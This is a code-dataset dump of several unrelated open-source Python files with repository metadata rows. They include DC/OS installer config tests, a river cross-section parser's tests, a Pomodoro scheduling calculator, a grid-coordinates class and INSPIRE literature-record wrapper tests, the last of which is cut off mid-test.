'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: These storage settings are not actually validated here, so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""
def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
def test_override_aws_template_storage_region_name(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
config_str += '\naws_template_storage_region_name: {}'.format(config_aws['region_name'])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
def aws_cf_configure(s3_bucket_name, config, config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
session = gen.build_deploy.aws.get_test_session(config_aws)
s3 = session.resource('s3')
s3_bucket = s3.Bucket(s3_bucket_name)
s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})
create_config(config, tmpdir)
create_fake_build_artifacts(tmpdir)
try:
with tmpdir.as_cwd():
return backend.do_aws_cf_configure()
finally:
objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
s3_bucket.delete_objects(Delete={'Objects': objects})
s3_bucket.delete()
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
| apache-2.0 | -2,982,937,157,660,341,000 | 33.562162 | 115 | 0.665077 | false |
Dioptas/Dioptas | dioptas/model/__init__.py | 1 | 1265 | # -*- coding: utf-8 -*-
# Dioptas - GUI program for fast processing of 2D X-ray diffraction data
# Principal author: Clemens Prescher ([email protected])
# Copyright (C) 2014-2019 GSECARS, University of Chicago, USA
# Copyright (C) 2015-2018 Institute for Geology and Mineralogy, University of Cologne, Germany
# Copyright (C) 2019-2020 DESY, Hamburg, Germany
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .CalibrationModel import CalibrationModel
from .ImgModel import ImgModel
from .MaskModel import MaskModel
from .PhaseModel import PhaseModel
from .PatternModel import PatternModel
from .OverlayModel import OverlayModel
from .BatchModel import BatchModel
| gpl-3.0 | 8,280,915,587,935,117,000 | 45.851852 | 94 | 0.781818 | false |
adrianbeloqui/Python | nested_lists.py | 1 | 1675 | """Given the names and grades for each student in a Physics class of N
students, store them in a nested list and print the name(s) of any
student(s) having the second lowest grade.
Note: If there are multiple students with the same grade, order their
names alphabetically and print each name on a new line.
Input Format
The first line contains an integer, N, the number of students.
The subsequent lines describe each student over 2N lines; the first
line contains a student's name, and the second line contains their
grade.
Constraints
2 <= N <= 5
There will always be one or more students having the second lowest
grade.
Output Format
Print the name(s) of any student(s) having the second lowest grade
in Physics; if there are multiple students, order their names
alphabetically and print each one on a new line.
"""
from operator import itemgetter
def second_lowest(*args):
arr = args[0]
    lowest, higher_lowest = arr[0], ["", float("inf")]
for student in arr:
if student[1] < higher_lowest[1]:
if student[1] < lowest[1]:
higher_lowest, lowest = lowest, student
elif student[1] == lowest[1]:
continue
else:
higher_lowest = student
return higher_lowest[1]
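# Illustrative example (editor's addition):
# second_lowest([['A', 50.0], ['B', 60.0], ['C', 50.0]]) returns 60.0,
# the second lowest distinct grade.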
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
second_largest_grade = second_lowest(students)
result_list = list(filter(lambda x: x[1] == second_largest_grade, students))
result_list.sort(key=itemgetter(0))
for student in result_list:
print(student[0]) | mit | -7,068,788,371,389,833,000 | 29.472727 | 80 | 0.666269 | false |
duncan-r/SHIP | tests/test_riverunit.py | 1 | 13279 | from __future__ import unicode_literals
import unittest
from ship.fmp.datunits import riverunit
from ship.fmp.datunits import ROW_DATA_TYPES as rdt
from ship.datastructures.rowdatacollection import RowDataCollection
from ship.datastructures import dataobject as do
from ship.fmp.fmpunitfactory import FmpUnitFactory
class RiverUnitTests(unittest.TestCase):
'''Tests for all of the methods in the river class.
The complications involved in writing these tests show that there is probably some
serious factoring needed in the RiverUnit class.
Perhaps breaking down the readData() method in to smaller chunks would be a good
start. Then looking at a similar approach to the setupUnit() method.
'''
def setUp(self):
        '''Sets up everything that is needed in multiple tests to save too
much mucking about.
'''
# Example list as read from the dat file on the readFile() method in FileTools.py
self.input_contents = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT\n',
'SECTION\n',
'1.069 Spill1 Spill2 Lat1\n',
' 15.078 1.111111 1000\n',
' 18\n',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 \n',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 \n',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 \n',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 \n',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 \n',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 \n',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 \n',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 \n',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 \n',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 \n',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 \n',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 \n',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 \n',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 \n',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 \n',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 \n',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 \n',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 \n']
# List as exported from the setupUnit() method
self.unit_data_test = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069',
' 15.078 1.111111 1000',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Lists for each of the data objects that are created when reading the file
self.bankmarker = ['LEFT', '', '', '', '', 'BED', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.chainage = [5.996, 6.936, 7.446, 7.635, 8.561, 9.551, 10.323, 10.904,
12.542, 13.74, 13.788, 13.944, 15.008, 16.355, 17.424, 18.449, 19.416, 19.420]
self.deactivation = ['LEFT', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.easting = [291391.67, 291391.43, 291391.3, 291391.25, 291391.01, 291390.75, 291390.55, 291390.4,
291389.98, 291389.67, 291389.66, 291389.62, 291389.34, 291389.0, 291388.72, 291388.46, 291388.21, 291388.21]
self.elevation = [37.56, 37.197, 36.726, 35.235, 35.196, 35.19, 35.229, 35.319,
35.637, 35.593, 35.592, 36.148, 36.559, 37.542, 38.518, 39.037, 39.146, 39.133]
self.northing = [86582.61, 86581.7, 86581.21, 86581.03, 86580.13, 86579.18, 86578.43, 86577.87,
86576.29, 86575.13, 86575.09, 86574.93, 86573.91, 86572.6, 86571.57, 86570.58, 86569.65, 86569.65]
self.panelmarker = [False, True, False, False, False, False, False, False,
False, False, False, False, True, False, False, False, False, False]
self.roughness = [0.08, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.08, 0.08, 0.08, 0.08, 0.08, 0.08]
self.rpl = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
self.special = ['16', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4095']
def test_readHeadData(self):
'''Checks that the readHeadData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
r = riverunit.RiverUnit()
# Put the test data into the method
r._readHeadData(self.unit_data_test, 0)
self.assertEqual(r._name, '1.069')
self.assertEqual(r._name_ds, 'unknown')
self.assertEqual(r.head_data['comment'].value, '(Culvert Exit) CH:7932 - Trimmed to BT')
self.assertEqual(r.head_data['distance'].value, 15.078)
self.assertEqual(r.head_data['slope'].value, 1.111111)
self.assertEqual(r.head_data['density'].value, 1000)
def test_readRowData(self):
'''Checks that the readRowData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
river = riverunit.RiverUnit()
# Put the test data into the readrowData() method
river.readUnitData(self.unit_data_test, 0)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.CHAINAGE), self.chainage)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ELEVATION), self.elevation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ROUGHNESS), self.roughness)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.PANEL_MARKER), self.panelmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.RPL), self.rpl)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.BANKMARKER), self.bankmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.EASTING), self.easting)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.NORTHING), self.northing)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.DEACTIVATION), self.deactivation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.SPECIAL), self.special)
self.assertEqual(river.unit_category, 'river')
self.assertEqual(river.unit_type, 'river')
def test_getData(self):
'''Test to check the suitability of the getData() method.
'''
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Setup the list that we expect to be returned from the getData() method
out_data = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069 Spill1 Spill2 Lat1',
' 15.078 1.1111 1000.00',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Get the data and check it against our template
data = river.getData()
        self.assertEqual(out_data, data, 'getData() formatting failed')
def test_addDataRow(self):
"""Test adding a new row to 'main' data."""
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Add with required only args
args = {rdt.CHAINAGE: 6.0, rdt.ELEVATION: 37.2}
river.addRow(args, index=1)
row = river.row_data['main'].rowAsList(1)
testrow = [6.0, 37.2, 0.039, False, 1.0, '', 0.0, 0.0, '', '~']
self.assertListEqual(testrow, row)
# Add with all args
args = {rdt.CHAINAGE: 6.1, rdt.ELEVATION: 37.4, rdt.ROUGHNESS: 0.06,
rdt.PANEL_MARKER: True, rdt.RPL: 1.1, rdt.BANKMARKER: 'BED',
rdt.EASTING: 22.5, rdt.NORTHING: 32.5, rdt.DEACTIVATION: 'RIGHT',
rdt.SPECIAL: '16'}
river.addRow(args, index=2)
row = river.row_data['main'].rowAsList(2)
testrow = [6.1, 37.4, 0.06, True, 1.1, 'BED', 22.5, 32.5, 'RIGHT', '16']
self.assertListEqual(testrow, row)
# Check it fails without required args
args = {rdt.CHAINAGE: 6.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
args = {rdt.ELEVATION: 36.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
# Check we catch non increasing chainage
args = {rdt.CHAINAGE: 5.0, rdt.ELEVATION: 37.2}
with self.assertRaises(ValueError):
river.addRow(args, index=3)
| mit | -1,056,165,014,091,718,900 | 63.461165 | 144 | 0.498607 | false |
Matt-Deacalion/Pomodoro-Calculator | pomodoro_calculator/__init__.py | 1 | 6013 | """
A pretty command line tool to calculate the number
of Pomodori available between two points in time.
"""
__author__ = 'Matt Deacalion Stevens'
__version__ = '1.0.2'
import datetime
from itertools import cycle
class PomodoroCalculator:
"""
Calculates the number of Pomodori available in an amount of time.
"""
def __init__(self, end, start='now', short_break=5, long_break=15,
pomodoro_length=25, group_length=4, interval=False, amount=False):
self.pomodoro_length_seconds = pomodoro_length * 60
self.amount_mode = False
if start == 'now':
self.start = datetime.datetime.now()
else:
self.start = self._create_datetime(start)
if interval:
self.end = self.start + self._create_timedelta(end)
elif amount:
# set dummy end. So we don't crash.
self.end = self.start + self._create_timedelta("48:00:00")
self.amount_mode = True
self.amount = int(end)
else:
self.end = self._create_datetime(end)
# if the end time is earlier than the start,
# overlap to the next day
if self.end.time() < self.start.time():
self.end += datetime.timedelta(days=1)
self.group_length = group_length
self.short_break = short_break
self.long_break = long_break
@property
def short_break_seconds(self):
"""
Returns `short_break` in seconds.
"""
return self.short_break * 60
@property
def long_break_seconds(self):
"""
Returns `long_break` in seconds.
"""
return self.long_break * 60
@property
def total_seconds(self):
"""
Return the total time span in seconds.
"""
delta = self.end - self.start
return int(delta.total_seconds())
def _create_timedelta(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a timedelta.
"""
args = dict(zip(
['hours', 'minutes', 'seconds'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.timedelta(**args)
def _create_datetime(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a datetime.
"""
args = dict(zip(
['hour', 'minute', 'second'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.datetime.now().replace(**args)
def _get_item(self, offset, item_type, index):
"""
Returns one of three types of Pomodori entities. A short break, a long
break or the Pomodoro itself. The returned dict also contains the
start and end datetimes.
"""
types = {
'short-break': self.short_break_seconds,
'long-break': self.long_break_seconds,
'pomodoro': self.pomodoro_length_seconds,
}
start = self.end - datetime.timedelta(seconds=offset)
end = start + datetime.timedelta(seconds=types[item_type])
return {
'index': index,
'pomodori-index': index // 2 + 1,
'type': item_type,
'start': start,
'end': end,
'length': int((end - start).total_seconds()),
}
def pomodori_segments(self, group_length=4):
"""
Generate Pomodori along with the short and long breaks in between.
Credit: http://codereview.stackexchange.com/questions/53970
"""
# every fourth Pomodori precedes a long break,
# all others have short breaks following them
return cycle(
['pomodoro', 'short-break'] * (group_length - 1) + ['pomodoro', 'long-break'],
)
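        # With the default group_length of 4, the cycle above repeats:
        #   pomodoro, short-break, pomodoro, short-break, pomodoro, short-break,
        #   pomodoro, long-break, ...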
def pomodori_schedule(self):
"""
Returns a Pomodori schedule, which is a dict that contains a
list of Pomodori segments (Pomodoro, short break or long
break) in chronological order.
Credit: http://codereview.stackexchange.com/questions/53970
"""
available_time = self.total_seconds
segments = []
# make sure we have enough time for at least one Pomodoro
if available_time < self.pomodoro_length_seconds:
return
for i, segment_name in enumerate(self.pomodori_segments(self.group_length)):
segment = self._get_item(available_time, segment_name, i + 1)
if self.amount_mode and segment['pomodori-index'] > self.amount:
break
elif segment['length'] > available_time:
break
available_time -= segment['length']
segments.append(segment)
if segments and segments[-1]['type'].endswith('break'):
segments.pop()
work_segments = [seg for seg in segments if seg['type'] == 'pomodoro']
rest_segments = [seg for seg in segments if seg['type'].endswith('break')]
return {
'segments': segments,
'start': self.start,
'end': segments[-1]['end'],
'seconds-per-pomodoro': self.pomodoro_length_seconds,
'total-pomodori': len(work_segments),
'total-breaks': len(rest_segments),
'total-rest-time': sum(seg['length'] for seg in rest_segments),
'total-work-time': sum(seg['length'] for seg in work_segments),
}
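# Usage sketch (hypothetical times; see the constructor signature above):
#
#     calc = PomodoroCalculator(end='12:00:00', start='09:00:00')
#     schedule = calc.pomodori_schedule()
#     schedule['total-pomodori']   # number of full Pomodori that fit
#     schedule['segments'][0]      # first segment dict: type, start, end, length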
def humanise_seconds(seconds):
"""
Takes `seconds` as an integer and returns a human readable
string, e.g. "2 hours, 5 minutes".
"""
units = []
unit_table = [('hour', 3600), ('minute', 60)]
for unit in unit_table:
quotient, seconds = divmod(seconds, unit[1])
if quotient:
units.append(
'{} {}'.format(
quotient,
unit[0] + ('s' if quotient > 1 else ''),
)
)
return ', '.join(units)
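# For example, humanise_seconds(7500) returns '2 hours, 5 minutes' and
# humanise_seconds(60) returns '1 minute'; remainders under a minute are dropped.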
| mit | 6,045,448,055,413,695,000 | 30.317708 | 90 | 0.557126 | false |
Yukarumya/Yukarum-Redfoxes | taskcluster/taskgraph/task/checksums_signing.py | 1 | 1076 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function, unicode_literals
from . import transform
class ChecksumsSigningTask(transform.TransformTask):
"""
A task implementing a checksums signing job. These depend on beetmover jobs
and sign the checksums after its being generated by beetmover
"""
@classmethod
def get_inputs(cls, kind, path, config, params, loaded_tasks):
if (config.get('kind-dependencies', []) != ["beetmover", "beetmover-l10n"]):
raise Exception("Checksums signing tasks must depend on beetmover tasks")
for task in loaded_tasks:
if not task.attributes.get('nightly'):
continue
if task.kind not in config.get('kind-dependencies'):
continue
checksums_signing_task = {'dependent-task': task}
yield checksums_signing_task
| mpl-2.0 | -1,961,531,478,082,989,000 | 38.851852 | 85 | 0.667286 | false |
colour-science/colour-branding | utilities/colour.py | 1 | 1033 | import maya.cmds as cmds
import numpy as np
spectrum = np.load(
r"D:\Documents\Personal\Graphics\Colour\spectrum.npy")[:, 35:325, :]
materials = [u'mia_material_x01', u'mia_material_x02', u'mia_material_x03',
u'mia_material_x04', u'mia_material_x05', u'mia_material_x06',
u'mia_material_x07', u'mia_material_x08', u'mia_material_x09',
u'mia_material_x10', u'mia_material_x11', u'mia_material_x12', ]
samples = np.linspace(0, 1, len(materials))
for i, material in enumerate(materials):
R = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 0][0])
G = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 1][0])
B = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 2][0])
# m = max(R, G, B)
m = 1
cmds.setAttr('{0}.diffuse'.format(material),
R / m, G / m, B / m,
type='double3')
| bsd-3-clause | 428,703,372,718,615,200 | 37.730769 | 77 | 0.549855 | false |
alainrinder/quoridor.py | src/GridCoordinates.py | 1 | 2281 | #
# GridCoordinates.py
#
# @author Alain Rinder
# @date 2017.06.02
# @version 0.1
#
class GridCoordinates:
"""
Coordinates on square grid
"""
def __init__(self, col, row):
self.col = col
self.row = row
def left(self):
"""
        Return the coordinates of the square at left, even if it does not exist
"""
return GridCoordinates(self.col - 1, self.row)
def right(self):
"""
        Return the coordinates of the square at right, even if it does not exist
"""
return GridCoordinates(self.col + 1, self.row)
def top(self):
"""
        Return the coordinates of the square at top, even if it does not exist
"""
return GridCoordinates(self.col, self.row - 1)
def bottom(self):
"""
        Return the coordinates of the square at bottom, even if it does not exist
"""
return GridCoordinates(self.col, self.row + 1)
def clone(self):
"""
Return identical coordinates
"""
return GridCoordinates(self.col, self.row)
def __eq__(self, other):
"""
Override the default Equals behavior.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
#return self.__dict__ == other.__dict__
return self.col == other.col and self.row == other.row
return NotImplemented
def __ne__(self, other):
"""
Define a non-equality test.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __hash__(self):
"""
Override the default hash behavior (that returns the id or the object).
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
return hash((self.col, self.row))
def __str__(self):
return "%d,%d" % (self.col, self.row)
| mit | 4,232,492,451,206,281,700 | 26.873418 | 113 | 0.562034 | false |
inspirehep/inspire-next | tests/unit/records/test_records_wrappers.py | 1 | 6282 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2017 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from inspirehep.modules.records.wrappers import LiteratureRecord
def test_literature_record_external_system_identifiers():
record = LiteratureRecord({
'external_system_identifiers': [
{
'schema': 'DESY',
'value': 'D04-00213',
},
{
'schema': 'ADS',
'value': '2004PrPh...52..200K',
},
{
'schema': 'ADS',
'value': '2006PhR...429..121K',
},
{
'schema': 'SPIRES',
'value': 'SPIRES-5682037',
},
],
})
expected = [
{
'url_link': 'http://adsabs.harvard.edu/abs/2004PrPh...52..200K',
'url_name': 'ADS Abstract Service',
},
]
result = record.external_system_identifiers
assert expected == result
def test_literature_record_external_system_identifiers_handles_kekscan():
record = LiteratureRecord({
'external_system_identifiers': [
{
'schema': 'DESY',
'value': 'D04-00213',
},
{
'schema': 'CDS',
'value': '2231692',
},
{
'schema': 'CDS',
'value': '2232052',
},
{
'schema': 'HAL',
'value': 'in2p3-01394924',
},
{
'schema': 'KEKSCAN',
'value': '200727065',
},
],
})
expected = [
{
'url_link': 'http://cds.cern.ch/record/2231692',
'url_name': 'CERN Document Server',
},
{
'url_link': 'https://hal.archives-ouvertes.fr/in2p3-01394924',
'url_name': 'HAL Archives Ouvertes',
},
{
'url_link': 'https://lib-extopc.kek.jp/preprints/PDF/2007/0727/0727065.pdf',
'url_name': 'KEK scanned document',
},
]
result = record.external_system_identifiers
assert expected == result
def test_literature_record_publication_information_with_pubinfo_freetext():
record = LiteratureRecord({
'publication_info': [
{
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_with_journal_title():
record = LiteratureRecord({
'publication_info': [
{
'artid': '128',
'journal_issue': '7',
'journal_title': 'Astropart.Phys.',
'journal_volume': '103',
'material': 'erratum',
'page_end': '48',
'page_start': '41',
'year': '2018',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
'artid': '128',
'journal_issue': '7',
'journal_title': 'Astropart.Phys.',
'journal_volume': '103',
'material': 'erratum',
'page_end': '48',
'page_start': '41',
'year': '2018',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_handles_missing_fields():
record = LiteratureRecord({
'publication_info': [
{
'journal_title': 'Astropart.Phys.',
'year': 2018,
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
expected = [
{
